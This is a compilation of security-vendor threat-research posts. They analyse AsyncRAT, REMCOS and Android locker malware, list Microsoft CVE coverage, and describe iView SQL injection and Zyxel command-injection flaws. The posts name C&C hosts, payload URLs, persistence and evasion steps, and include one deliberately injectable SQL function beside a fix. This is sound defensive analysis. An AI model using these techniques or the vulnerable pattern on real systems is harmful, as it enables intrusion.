
Known Trojan named AsyncRAT is now going fileless

Writing completely new malware is always harder than tweaking code that is already written and working. Threat actors reuse existing malware code, either by buying it on the dark web or by taking open-source code available on platforms such as GitHub or Pastebin. They now focus more on the delivery mechanism and the infection chain, keeping a low profile and exposing as little malicious code as possible to traditional security products. Security software that inspects memory, however, is still able to spot the actual malicious behavior. SonicWall Real Time Deep Memory Inspection (RTDMI) has detected a VBScript inside an archive which executes a web-hosted PowerShell script to deliver and execute a fileless AsyncRAT on the victim’s machine. The source code of AsyncRAT is publicly available on GitHub.

VBScript

The VBScript is obfuscated using multiple string reverse and concatenate operations. It obtains the Windows Script Host shell object via the CLSID “F935DC22-1CF0-11D0-ADB9-00C04FD58A0B” and uses it to execute a PowerShell script fetched from a Uniform Resource Locator (URL):


Instead of a “.ps1” extension, the URL hosting the PowerShell script uses a “.txt” extension, which makes the URL look less suspicious. The malware does not save the PowerShell script to the file system; it executes the script in memory instead:

PowerShell Script

The infection chain starts with the VBScript, involves PowerShell scripts, the task scheduler, a DLL loader and a batch file from which a PowerShell cmdlet is read, and finally executes AsyncRAT on the victim’s machine:


The web-hosted PowerShell script is highly obfuscated. It creates the malware directory “C:\ProgramData\HVLWIQDYCCPXWPCLXUYGXB” to save the intermediate files used in the infection chain, and sleeps for 3 seconds between the execution of the various tasks:


Intermediate files saved in the malware directory:

  • HVLWIQDYCCPXWPCLXUYGXB.ps1 (first-stage PowerShell script)
  • HVLWIQDYCCPXWPCLXUYGXB.vbs (obfuscated VBScript)
  • HVLWIQDYCCPXWPCLXUYGXB.bat (batch file containing the cmdlet)
  • STVEVBEQXPLHZJQTHEIGGV.ps1 (final-stage PowerShell script)

The web-hosted PowerShell script continues the infection chain by executing the first-stage PowerShell script, which schedules a task to run the VBScript from the malware directory every 3 minutes:


The highly obfuscated VBScript obtains the Win32_Process object through Windows Management Instrumentation (WMI) to spawn a PowerShell process, which reads the cmdlet from the batch file and executes the final-stage PowerShell script:


The final-stage PowerShell script contains two encoded binaries: the DLL loader and AsyncRAT. The malware executes the DLL loader, passing the AsyncRAT binary as a byte array and the path “C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe” as arguments. The DLL loader then loads and executes AsyncRAT in the context of “jsc.exe”:


AsyncRAT

AsyncRAT is a well-known, advanced malware family whose source code is publicly available on GitHub. The threat actor has obfuscated the function names, disabled some of the features and slightly customized the code to their requirements:

The malware initializes its configuration components and creates the mutex “AsyncMutex_6SI8OkPnk” to guarantee that only a single instance runs at a time. The malware contains code to check for a virtual environment, create a persistence entry and obtain elevated privileges; however, in this variant that code is disabled through a flag value.


C&C Communication

The malware connects to its Command and Control (C&C) server “rock.dynip.org” on port 222:


The malware sends the following information from the victim’s machine to the C&C server:

  • Packet type
  • Hardware ID
  • Username
  • Operating System info
  • Execution path
  • Version
  • Execution mode (Admin | User)
  • Active GUI window name
  • Antivirus
  • Executable time
  • Group


The malware receives the following commands from the C&C server:

  • ping
  • pong
  • plugin
  • savePlugin


ping

When the malware receives the ping command from the C&C server, no action is needed:

pong

The malware has registered a timer whose interval value keeps increasing. Once the malware receives the pong command, the current interval value is sent to the C&C server with the packet type set to “pong”.

plugin

The malware receives the plugin command along with the plugin’s hash value. It checks whether the plugin is already installed on the victim’s machine by looking up the hash value in the registry under “HKEY_CURRENT_USER\Software”. If the plugin is already installed, the malware executes it in memory; otherwise it sends the plugin hash value back with the packet type set to “sendPlugin”:


savePlugin

The malware receives the “savePlugin” command along with the compressed plugin bytes and their hash value. It saves the compressed plugin bytes in the registry entry “HKEY_CURRENT_USER\Software\6D8AD34F424F899EC2B0”, using the hash of the plugin as the value name. The plugin bytes are then decompressed and invoked by the malware:


The C&C server sends 2 plugins to the victim’s machine:

Plugin 1

Name: Miscellaneous

SHA256: c3f842cc2228aff03f109bd7e13cc233e2ac7a383b35fdae9171c80af6def354

Plugin 2

Name: RemoteDesktop

SHA256: 470e625ab097155fe562394a450f3830d7725d8032f00dd3fb16243a7cf62930


The archive file is not available on any of the popular threat intelligence sharing portals such as VirusTotal and ReversingLabs, which indicates its uniqueness and limited distribution:


Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

Malicious Embedded Office File inside PDF is delivering REMCOS RAT

The SonicWall Capture Labs Threat Research team has observed a malicious PDF file, arriving as an e-mail attachment and detected by the SonicWall RTDMI™ engine, which delivers REMCOS RAT as the final payload.


Infection Cycle:

The PDF file has a malicious embedded DOC file, which is dropped to the %temp% folder and executed from there. The PDF file has an OpenAction tag set to a JavaScript embedded in the PDF; on opening the PDF file the script is executed. The embedded DOC file is named “has been verified. However PDF, SVG, xlsx, .docx”.

JavaScript inside the PDF, which drops and executes the DOC file

The DOC file references an external URL pointing to an RTF file. It loads the RTF file from “hxxps://shortener[.]vc/fSpur”, whose final redirected URL is “hxxp://45[.]85[.]190[.]156/receipt/290.doc”. This RTF file contains a CVE-2017-11882 exploit, which downloads a .NET executable to “C:\Users\Public\vbc.exe” and executes it.

External Frame Object Link in webSettings.xml.rels

The .NET executable ‘vbc.exe’ copies itself to %APPDATA% as ‘doc.exe’, creates a RUN registry entry for it named ‘wix’, and then executes doc.exe.

The .NET executable holds a compressed .NET DLL in its ‘AppPropsLib.Documents.resources’ resource object, under the name ‘_22’. It decompresses the resource, loads the obfuscated DLL (whose internal name is Periodicity.dll) in memory and calls its second export, passing three string arguments: “5374617469634172726179496E69745479706553697A65”, “7157624F” and “AppPropsLib”. The first argument is “StaticArrayInitTypeSize” (passed in hex format), the name of a Bitmap object present in the doc.exe resources; the second argument is the decryption key “qWbO” (passed in hex format); and the third argument is the resource name in doc.exe.

Periodicity.dll then loads the bitmap resource from doc.exe and extracts the ARGB values of all the pixels into an array. It reads the encrypted data size from the ARGB value of the first pixel, copies the encrypted data into another array, and decrypts it using the key passed as an argument and the last byte of the encrypted data array.

Loading the ARGB values of the pixels into an array

Decrypting using the key passed in the argument

The decrypted data is yet another highly obfuscated .NET DLL, whose internal name is Thookinieng.dll. This DLL has encrypted resources, one of which is REMCOS RAT. Its decrypted data contains some interesting strings:

Strings used to check for a sandbox or VM

PowerShell command to add an ExclusionPath for Defender

REMCOS keeps its configuration in the resource named settings. The very first byte gives the RC4 key size, followed by the RC4 key, which is in turn followed by the encrypted configuration data:

The version of the REMCOS RAT payload is ‘v3.4.0 Pro’. It reads the key from the resource and decrypts the configuration data with the RC4 algorithm; the configuration contains the Command and Control (C&C) server’s IP address, port number, password, the REMCOS executable’s name, the key logging filename, etc.:
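The resource layout described above (key length byte, RC4 key, RC4 ciphertext) is all an analyst needs to pull the configuration out of a dumped settings resource. The following is an added example, not code from the post or from REMCOS: it parses that layout, rejects truncated or keyless resources, and runs it against a constructed sample with placeholder values; the “|” field separator used for the sample is an assumption, not the real REMCOS delimiter.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings_resource(blob: bytes) -> dict:
    """Split a 'settings' resource laid out as the post describes:
    byte 0 = RC4 key length, then the key, then the RC4-encrypted configuration.
    Malformed input (empty key, truncated key) is rejected instead of being 'decrypted' to junk."""
    if len(blob) < 2:
        raise ValueError("resource too short to hold a key length and a key")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError(f"invalid key length {key_len} for a {len(blob)}-byte resource")
    key = blob[1:1 + key_len]
    ciphertext = blob[1 + key_len:]
    return {"key": key, "config": rc4(key, ciphertext)}


def extract_config_fields(blob: bytes, separator: bytes = b"|") -> list:
    """Decrypt the resource and split the configuration on a separator.
    The '|' separator is an assumption for the constructed sample, not REMCOS's real delimiter."""
    return parse_settings_resource(blob)["config"].split(separator)


def build_settings_resource(key: bytes, config: bytes) -> bytes:
    """Inverse of parse_settings_resource; used only to construct the sample below."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must be non-zero and fit in one byte")
    return bytes([len(key)]) + key + rc4(key, config)


# Constructed sample with placeholder values; not a configuration taken from a real sample.
SAMPLE_KEY = b"example-rc4-key"
SAMPLE_CONFIG = b"192.0.2.10:2404|placeholder-password|remcos.exe|logs.dat"
SAMPLE_RESOURCE = build_settings_resource(SAMPLE_KEY, SAMPLE_CONFIG)

if __name__ == "__main__":
    for field in extract_config_fields(SAMPLE_RESOURCE):
        print(field.decode("ascii", "replace"))
```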


Malicious PDF hashes:


At the time of writing this blog, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its spreading potential:

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

Android ransomware purports to be a free social media follower application

The SonicWall Capture Labs Threat Research team has observed many Android locker ransomware samples that ask the victim to communicate through social media platforms. There is no assurance of receiving the key even after paying the ransom; the operators simply use these apps for monetary gain. Some of the applications look like free social media follower apps but are ransomware, as shown below.


Figure 1: Ransomware App Icons


All these malicious apps were recently submitted to malware sharing platforms such as VirusTotal.


Figure 2: VirusTotal submission history


Infection Cycle:

The major permissions used in these apps are listed below:

  • SYSTEM_ALERT_WINDOW
  • RECEIVE_BOOT_COMPLETED
  • SET_WALLPAPER
  • READ_EXTERNAL_STORAGE
  • WRITE_EXTERNAL_STORAGE
  • READ_CONTACTS
  • READ_SMS
  • ACCESS_FINE_LOCATION
  • WAKE_LOCK
  • INTERNET
  • REQUEST_INSTALL_PACKAGES
  • CAMERA

The “SYSTEM_ALERT_WINDOW” permission is used to display overlay windows above all activity windows in order to show the ransom note.

After installation, the app is not visible in the app drawer; to view the installed app’s information, one has to go to Settings -> Apps.


Figure 3: Malicious app visible under settings


In the manifest file, “android.intent.category.LAUNCHER” is not set for MainActivity, as shown below, which means that this application has no launcher icon on the home screen.


Figure 4: Main activity launcher missing


The malicious application launches after the “ACTION_BOOT_COMPLETED” system event, which is fired once the Android system has completed the boot process. It then sets a lock screen with a ransom note, and the user is no longer able to access the device.


Figure 5: Ransom note


On further investigation of the malicious code, each malicious file has a different ransom note and a different key, which is present in the code itself under the “password” field. No actual encryption of any file on the device takes place; the device is only locked by the screen overlay.


Figure 6: Password and Ransom note present in code
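The three manifest traits described above (no LAUNCHER category on any activity, a receiver for BOOT_COMPLETED, and the SYSTEM_ALERT_WINDOW overlay permission) are cheap to check during triage of a decoded APK. The following is an added example, not code from the post: it runs the checks over a decoded AndroidManifest.xml (as produced by apktool or a similar decoder; that step is assumed) and is exercised on a constructed manifest that mirrors the sample’s layout.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"  # ElementTree spells android:name this way
LAUNCHER = "android.intent.category.LAUNCHER"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"

# Subset of the post's permission list that matters most for a locker (overlay, autostart, data access).
RISKY_PERMISSIONS = {
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.REQUEST_INSTALL_PACKAGES",
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
}


def _has_category(component, category: str) -> bool:
    return any(cat.get(NAME_ATTR) == category
               for flt in component.iter("intent-filter")
               for cat in flt.iter("category"))


def _has_action(component, action: str) -> bool:
    return any(act.get(NAME_ATTR) == action
               for flt in component.iter("intent-filter")
               for act in flt.iter("action"))


def triage_manifest(manifest_xml: str) -> dict:
    """Flag the locker traits from the post: hidden icon (no LAUNCHER activity),
    autostart on boot (BOOT_COMPLETED receiver) and the overlay permission."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(NAME_ATTR) for p in root.iter("uses-permission")}
    activities = list(root.iter("activity"))
    findings = {
        "hidden_icon": bool(activities) and not any(_has_category(a, LAUNCHER) for a in activities),
        "boot_autostart": any(_has_action(r, BOOT_COMPLETED) for r in root.iter("receiver")),
        "overlay_permission": "android.permission.SYSTEM_ALERT_WINDOW" in perms,
        "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
    }
    # Number of the three structural locker traits present (0..3); 3 is a strong triage signal.
    findings["locker_indicators"] = sum(
        findings[k] for k in ("hidden_icon", "boot_autostart", "overlay_permission"))
    return findings


# Constructed manifest modelled on the post's description; package and class names are invented.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.freefollowers">
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Free Followers">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
      </intent-filter>
    </activity>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```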


SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):


Microsoft Security Bulletin Coverage for July 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-22034 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 340:Malformed-File exe.MP_261

CVE-2022-22047 Windows CSRSS Elevation of Privilege
ASY 339:Malformed-File exe.MP_260

CVE-2022-30202 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
ASPY 341:Malformed-File exe.MP_262

CVE-2022-30216 Windows Server Service Tampering Vulnerability
ASPY 334:Malformed-File exe.MP_258

CVE-2022-30220 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 335:Malformed-File exe.MP_259

Adobe Coverage:
CVE-2022-34215 Acrobat Reader Out-of-bounds Read Vulnerability
ASPY 336:Malformed-File pdf.MP_554

CVE-2022-34222 Acrobat Reader Out-of-bounds Read Vulnerability
ASPY 337:Malformed-File pdf.MP_555

CVE-2022-34227 Acrobat Reader Use After Free Vulnerability
ASPY 338:Malformed-File pdf.MP_556

The following vulnerabilities do not have exploits in the wild:
CVE-2022-21845 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22022 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22023 Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-22024 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22025 Windows Internet Information Services Cachuri Module Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-22026 Windows CSRSS Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-22027 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22028 Windows Network File System Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22029 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22031 Windows Credential Guard Domain-joined Public Key Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22036 Performance Counters for Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22037 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22038 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22039 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22040 Internet Information Services Dynamic Compression Module Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-22041 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22042 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22043 Windows Fast FAT File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22045 Windows.Devices.Picker.dll Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22048 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-22049 Windows CSRSS Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-22050 Windows Fax Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22711 Windows BitLocker Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-23816 AMD CPU Branch Type Confusion
There are no known exploits in the wild.
CVE-2022-23825 AMD CPU Branch Type Confusion
There are no known exploits in the wild.
CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data
There are no known exploits in the wild.
CVE-2022-30181 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30187 Azure Storage Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30203 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-30205 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30206 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30208 Windows Security Account Manager (SAM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30209 Windows IIS Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30211 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30212 Windows Connected Devices Platform Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30213 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30214 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30215 Active Directory Federation Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30221 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30222 Windows Shell Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30223 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30224 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30225 Windows Media Player Network Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30226 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33632 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-33633 Skype for Business and Lync Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33637 Microsoft Defender for Endpoint Tampering Vulnerability
There are no known exploits in the wild.
CVE-2022-33640 Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33641 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33642 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33643 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33644 Xbox Live Save Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33650 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33651 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33652 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33653 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33654 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33655 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33656 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33657 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33658 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33659 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33660 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33661 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33662 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33663 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33664 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33665 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33666 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33667 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33668 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33669 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33671 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33672 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33673 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33674 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33675 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33676 Azure Site Recovery Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33677 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33678 Azure Site Recovery Remote Code Execution Vulnerability
There are no known exploits in the wild.

Advantech iView SQL Injection Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Advantech iView is a Simple Network Management Protocol-based element management software provided free-of-charge with intelligent FTTx, Optical Access, Media Conversion and eWorx Smart Industrial Ethernet Switch solutions. iView features an intuitive Graphical User Interface that provides a real-life representation of all installed B+B SmartWorx equipment, enables network managers to control and monitor device functions, port settings, receive device status information and traffic statistics via SNMP. iView supports multiple platforms; iView is a Web-based application that runs on 32-bit/64-bit Windows using Microsoft Edge/IE, Google Chrome or Mozilla Firefox browsers.

  A SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the ID parameter in the updateSegmentInfo process.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-2135.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C).

  Base score is 7.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.4 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user sends an HTTP GET/POST request to the Request-URI “/iView3/NetworkServlet”, the function NetworkServlet.doPost() is called. The function NetworkServlet.doPost() first checks the value of the parameter page_action_type and compares it against multiple values, each of which corresponds to a different action performed by the server. The value of importance for this vulnerability is “updateSegmentInfo”: if the parameter page_action_type equals “updateSegmentInfo”, the function NetworkServlet.updateSegmentInfo() is called.

  The function NetworkServlet.updateSegmentInfo() is used to update the name of created network segments. The value of the parameter data is stored in the variable strJSONObj and is passed to the function DeviceTreeTable.saveSegmentInfo().

  The function DeviceTreeTable.saveSegmentInfo() prepares the UPDATE SQL query. The string strJSONObj is converted into a JSON array and stored in the variable arrayJSON. The value of the JSON key DESC is then checked for SQL injection characters. If no such characters exist, the following SQL query is prepared and run on the database:

  The vulnerability exists because the value of the JSON key ID is never checked for SQL injection characters. If an attacker sends a request similar to the following:

  which the data parameter decodes to:

  which would cause the following SQL query to be executed:

  This query would cause the MySQL server to sleep for 30 seconds.
  *Note, that this same action is performed when a user accesses the Request-URI “/iView3/CommandServle
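The root cause above is a character blacklist applied to one JSON field (DESC) while the other (ID) is concatenated into the query text. The following is an added example, not iView’s code: a small Python port of the pattern against an in-memory SQLite table (the table and column names are assumptions), placing the flawed builder beside the hardened one, which enforces the integer type of ID and binds both values as parameters.

```python
import json
import re
import sqlite3

# Blacklist of the kind the post says iView applies to DESC only; the exact character set is an assumption.
SQLI_CHARS = re.compile(r"['\";#]|--|/\*")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the segment table (name and columns are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE segment (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO segment VALUES (?, ?)",
                     [(1, "Floor 1"), (2, "Floor 2"), (3, "Datacenter")])
    conn.commit()
    return conn


def save_segment_info_vulnerable(conn: sqlite3.Connection, data: str) -> int:
    """Mirrors the flaw: DESC is filtered, but ID is concatenated into the query unchecked.
    Returns the number of rows the UPDATE touched."""
    obj = json.loads(data)
    desc, seg_id = str(obj["DESC"]), str(obj["ID"])
    if SQLI_CHARS.search(desc):
        raise ValueError("DESC contains forbidden characters")
    sql = f"UPDATE segment SET name = '{desc}' WHERE id = {seg_id}"  # ID lands in the SQL text
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def save_segment_info_fixed(conn: sqlite3.Connection, data: str) -> int:
    """Hardened form: ID must be an integer, and both values are bound as parameters,
    so neither field can change the structure of the statement."""
    obj = json.loads(data)
    try:
        seg_id = int(obj["ID"])
    except (TypeError, ValueError):
        raise ValueError("ID must be an integer") from None
    cur = conn.execute("UPDATE segment SET name = ? WHERE id = ?", (str(obj["DESC"]), seg_id))
    conn.commit()
    return cur.rowcount


def segment_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT name FROM segment ORDER BY id")]


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, crafted ID:",
          save_segment_info_vulnerable(conn, '{"ID": "2 OR 1=1", "DESC": "Lab"}'), "rows changed")
    conn = make_db()
    try:
        save_segment_info_fixed(conn, '{"ID": "2 OR 1=1", "DESC": "Lab"}')
    except ValueError as err:
        print("fixed, crafted ID rejected:", err)
```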

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the target server.

Triggering Conditions:

  The vulnerability is triggered when the HTTP request is processed and the SQL query is executed.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2982 Advantech iView SQL Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following patch to address this vulnerability:
  Vendor Advisory

Zyxel USG FLEX Command Injection Vulnerability

The Zyxel USG FLEX Series supports IPsec, SSL, and L2TP-based VPNs, making it an ideal solution for providing a secure network to access remote or home-based workers. Zero-configuration remote access removes complicated setup challenges making it easier for employees to establish VPN connections to the office without the need for IT support.

An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

OS Command Injection

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically to fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Zyxel USG FLEX Command Injection | CVE-2022-30525
By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an unauthenticated attacker can gain remote command execution on a vulnerable Zyxel device as the nobody user.

The following versions are affected:

  • USG FLEX 100(W), 200, 500, 700 ZLD V5.00 through ZLD V5.21
  • USG FLEX 50(W) / USG20(W)-VPN ZLD V5.10 through ZLD V5.21

Zyxel has patched this vulnerability.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15761:Zyxel USG FLEX 100W Command Injection

Threat Graph

GuLoader: A fileless shellcode based malware in action

A good thief steals without leaving any footprint behind; fileless malware does the same job in the threat world. If, in addition, the fileless malware gets the work done without involving a Portable Executable (PE) file, not even in memory, that is the icing on the cake. GuLoader is a fileless, shellcode-based malware recently observed by the SonicWall threat research team. A VBS script inside an archive file is delivered to the victim’s machine as an email attachment and loads the GuLoader shellcode into the PowerShell executable. GuLoader then downloads and executes other malware in the memory of a legitimate process:

Infection Cycle:

VBScript

